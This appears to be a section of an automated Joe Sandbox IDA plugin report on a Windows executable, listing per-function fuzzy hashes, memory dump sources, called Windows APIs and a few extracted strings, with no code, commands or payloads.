                                                                                • Instruction ID: 89b3503dfb4c7cf835b2cd6e9517515adfbfc6544939fbe91ebbad1a32e46112
                                                                                • Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                • Instruction Fuzzy Hash: 68116379B0968185E6008F16A84816577A5BF94FC8F5C4435CE5EF3B22DF7CE9418345
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastPointer
                                                                                • String ID:
                                                                                • API String ID: 2976181284-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Item$RectText$ClientWindowswprintf
                                                                                • String ID:
                                                                                • API String ID: 402765569-0
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF65593EBAD,?,?,?,?,00007FF655935752,?,?,?,00007FF6559356DE), ref: 00007FF65593EB5C
                                                                                • GetProcessAffinityMask.KERNEL32 ref: 00007FF65593EB6F
                                                                                Similarity
                                                                                • API ID: Process$AffinityCurrentMask
                                                                                • String ID:
                                                                                • API String ID: 1231390398-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                • String ID:
                                                                                • API String ID: 1173176844-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                • String ID:
                                                                                • API String ID: 588628887-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1017591355-0
                                                                                APIs
                                                                                  • Part of subcall function 00007FF65593E948: ReleaseSemaphore.KERNEL32 ref: 00007FF65593E974
                                                                                  • Part of subcall function 00007FF65593E948: FindCloseChangeNotification.KERNELBASE ref: 00007FF65593E993
                                                                                  • Part of subcall function 00007FF65593E948: DeleteCriticalSection.KERNEL32 ref: 00007FF65593E9AA
                                                                                  • Part of subcall function 00007FF65593E948: CloseHandle.KERNEL32 ref: 00007FF65593E9B7
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF655941ACB
                                                                                Similarity
                                                                                • API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1624603282-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                APIs
                                                                                  • Part of subcall function 00007FF655933EC8: FindClose.KERNELBASE(?,?,00000000,00007FF655940811), ref: 00007FF655933EFD
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65592E993
                                                                                Similarity
                                                                                • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1011579015-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: ef3369d01a97c9aa4f3b4977493ba9f0ef8ebed8b0182d05534ad700cb30ef07
                                                                                • Instruction ID: 112ae603763ab02c742e246e2461fe5750112f05d2f592dae6a78ad197065b95
                                                                                • Opcode Fuzzy Hash: ef3369d01a97c9aa4f3b4977493ba9f0ef8ebed8b0182d05534ad700cb30ef07
                                                                                • Instruction Fuzzy Hash: 2A41046AA18B81C1EE109B29E54D37963A1EB85FDCF191134EA4D9779BDF3CE840C600
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                • String ID:
                                                                                • API String ID: 3947729631-0
                                                                                • Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                • Instruction ID: 44ec5b3da2e4b73138c1aee5e05e14f98b35fa80c59428bf7f645dcc4bda8ae9
                                                                                • Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                • Instruction Fuzzy Hash: 2B41C439A186C282FB249B11A4581782292AF55F49F4C443ADA0EF76A3DF3CEC55C781
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                                • String ID:
                                                                                • API String ID: 680105476-0
                                                                                • Opcode ID: 6f88c17e658a7e6a764477403b9247f1d27f5880b65831beeeee99c6ba04093e
                                                                                • Instruction ID: 2d3a71b7debc1b797cfe031fd46b6de2695ad268494df6d2f03c94ddea7907e9
                                                                                • Opcode Fuzzy Hash: 6f88c17e658a7e6a764477403b9247f1d27f5880b65831beeeee99c6ba04093e
                                                                                • Instruction Fuzzy Hash: A1219F26A0929185EA149E91A80827D6251EB04FF4F6C0B30DE3DA7BC2DF7CE8619344
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: 0c8e9c2245f2fbf425fa0cd7f95d31ecd9f6f203860eee89bbc703c5aebe3acc
                                                                                • Instruction ID: 921a82d8fbbbab4257b28c3d0792b1ec2295cd133b457d4c7b56af4d4772400a
                                                                                • Opcode Fuzzy Hash: 0c8e9c2245f2fbf425fa0cd7f95d31ecd9f6f203860eee89bbc703c5aebe3acc
                                                                                • Instruction Fuzzy Hash: 53217F2AB185C261EA08DB60D9483FCA310FB44F88F984031E71D976A3CF3CA864C300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                • Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                • Instruction ID: 6cd099d37a3dfb9f1c42e876f902f729ff942dc90a291dc19b0f5adf2122e508
                                                                                • Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                • Instruction Fuzzy Hash: C9117C3A90C7C382FB109B50A48813962A4FF40B88F5C0135EA8DE7693DF3CEC549780
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: e211765aad0e482f14211f193c2fa738a397cbf9b51fc622cf430de4bdc09e7c
                                                                                • Instruction ID: b3668bbe3fcbaad7e6b33e5b107071b8fadac27fe96dd4f7f0d4240d4f66224e
                                                                                • Opcode Fuzzy Hash: e211765aad0e482f14211f193c2fa738a397cbf9b51fc622cf430de4bdc09e7c
                                                                                • Instruction Fuzzy Hash: 860126AAE187C541EE119B28E84923D7361FFC9F98F844231E69C97BA7DF2CD4408704
                                                                                APIs
                                                                                  • Part of subcall function 00007FF655951604: GetModuleHandleW.KERNEL32(?,?,?,00007FF655951573,?,?,?,00007FF65595192A), ref: 00007FF65595162B
                                                                                • DloadProtectSection.DELAYIMP ref: 00007FF6559515C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: DloadHandleModuleProtectSection
                                                                                • String ID:
                                                                                • API String ID: 2883838935-0
                                                                                • Opcode ID: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
                                                                                • Instruction ID: e3df5d3a0e9d99988518a3110582003543fa7001c4e29f8b3bab9a8a4fc6d6c0
                                                                                • Opcode Fuzzy Hash: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
                                                                                • Instruction Fuzzy Hash: 9E11BEA8D0D6C741FB619B15A86C3B01390AF14B4DF1C0874C94DE62A3FF3CACA9D652
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                • Instruction ID: 29670c58c8fc7bb45c3f87ec6d624426bdc4f369d6fb0ce51f072c22641b236c
                                                                                • Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                • Instruction Fuzzy Hash: 3EF06D9CF0A78745FE545B6199193B412819F84FAAF0C5430C90EEA3C3FF2CEEA54212
                                                                                APIs
                                                                                  • Part of subcall function 00007FF6559340BC: FindFirstFileW.KERNELBASE ref: 00007FF65593410B
                                                                                  • Part of subcall function 00007FF6559340BC: FindFirstFileW.KERNEL32 ref: 00007FF65593415E
                                                                                  • Part of subcall function 00007FF6559340BC: GetLastError.KERNEL32 ref: 00007FF6559341AF
                                                                                • FindClose.KERNELBASE(?,?,00000000,00007FF655940811), ref: 00007FF655933EFD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Find$FileFirst$CloseErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1464966427-0
                                                                                • Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                                • Instruction ID: aeceaf16711f5c270c2cac9670188f6ae2956f42947a9f69d5eaec6f0a031790
                                                                                • Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                                • Instruction Fuzzy Hash: CCF0A46A50C2C1C5EA10AB79A1081B937A09B15FB8F5E5334EA3D572C7CF2CD844C745
                                                                                APIs
                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF65593207E), ref: 00007FF6559320F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ChangeCloseFindNotification
                                                                                • String ID:
                                                                                • API String ID: 2591292051-0
                                                                                • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                • Instruction ID: 4b9ea9cc25c2b3478fb0057fe1cf2e7b40dc0d98b7dcce35c34f78611220ce53
                                                                                • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                • Instruction Fuzzy Hash: E3F08C26A086C285FF248BA0E649279A6A1EB14F7CF5E4334D73C951D6CF2CDC958300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: File
                                                                                • String ID:
                                                                                • API String ID: 749574446-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID:
                                                                                • API String ID: 3081899298-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CurrentDirectory
                                                                                • String ID:
                                                                                • API String ID: 1611563598-0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                                                                                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                • API String ID: 2659423929-3508440684
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                                                • String ID: %ls$%s: %s
                                                                                • API String ID: 2539828978-2259941744
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfomemcpy_s
                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                • API String ID: 1759834784-2761157908
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                                                • String ID: rtmp
                                                                                • API String ID: 3587137053-870060881
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1693479884-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: 206a0f393bd3dfe93c209e4185319300a1f109cb37c0a30460c8df3f59e3349e
                                                                                • Instruction ID: b1cf0f03243954faf7347cc5855fbc9da77c2892554d2a87468c1ee8944b8e6e
                                                                                • Opcode Fuzzy Hash: 206a0f393bd3dfe93c209e4185319300a1f109cb37c0a30460c8df3f59e3349e
                                                                                • Instruction Fuzzy Hash: 66B1D46AB14AC685EB109B65DC482ED2361FF85BC8F581231EA5DA3B9BDF3CD950C300
                                                                                APIs
                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF65595FAC4
                                                                                  • Part of subcall function 00007FF655957934: GetCurrentProcess.KERNEL32(00007FF655960CCD), ref: 00007FF655957961
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                • String ID: *?$.
                                                                                • API String ID: 2518042432-3972193922
                                                                                • Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                                • Instruction ID: 8bf8e3e30de6ff4b54f8ff861d994a3a7cad1273bd42eb4b1889d9c9e34333ca
                                                                                • Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                                • Instruction Fuzzy Hash: ED51C2AAB15B9581EB10DFA194184B963A4FF48FE8B484531DE5DA7B86DF3CD8528300
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: memcpy_s
                                                                                • String ID:
                                                                                • API String ID: 1502251526-0
                                                                                • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                • Instruction ID: 48acab48538c02f17cc16373e0155e43005b1025a1b8b952cbc17a79477a46fa
                                                                                • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                • Instruction Fuzzy Hash: B5D19236B183C687DB34CF55A18866AB791F798B88F188134DB4AA7B45DF3CEC458B40
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: ErrorFormatFreeLastLocalMessage
                                                                                • String ID:
                                                                                • API String ID: 1365068426-0
                                                                                • Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                                • Instruction ID: 4a2e0b16f3599e660e43bd02cdac6ea0c5852d95b40c0d3cbe2f53418526cef7
                                                                                • Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                                • Instruction Fuzzy Hash: 9601177960C78182D7109F52B8541BE63A5FB89FC5F4C4034DA8D97B46CF3CD9158740
                                                                                Strings
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .
                                                                                • API String ID: 0-248832578
                                                                                • Opcode ID: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                                                                                • Instruction ID: d499d07d1097564cc16894cf5794069b4fb90fabe82ba965286401bd74671c51
                                                                                • Opcode Fuzzy Hash: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                                                                                • Instruction Fuzzy Hash: BF310866B186D145EB209B36E8087A96A91AF94FF8F188235DE5C97BC7CF3CD9158300
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: ExceptionRaise_clrfp
                                                                                • String ID:
                                                                                • API String ID: 15204871-0
                                                                                • Opcode ID: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
                                                                                • Instruction ID: 72f9f5d22e67437b9c7ae5438b91971e00319e938c83594cfc6952a10e569897
                                                                                • Opcode Fuzzy Hash: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
                                                                                • Instruction Fuzzy Hash: 33B15877601B898AEB19CF29C84A3683BA0F744F4CF598921DA5D937A9CF3DD855C700
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: ObjectRelease$CapsDevice
                                                                                • String ID:
                                                                                • API String ID: 1061551593-0
                                                                                • Opcode ID: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
                                                                                • Instruction ID: a55452bb5dbeb61e0d7f4c4c74a909f54c1f35b9cde28cee0270980067a320b6
                                                                                • Opcode Fuzzy Hash: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
                                                                                • Instruction Fuzzy Hash: 5181093AB18B45C6EB108F6AD4546AD3771BB84F88F044122DE4DA7B25DF3CD949C780
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: FormatInfoLocaleNumber
                                                                                • String ID:
                                                                                • API String ID: 2169056816-0
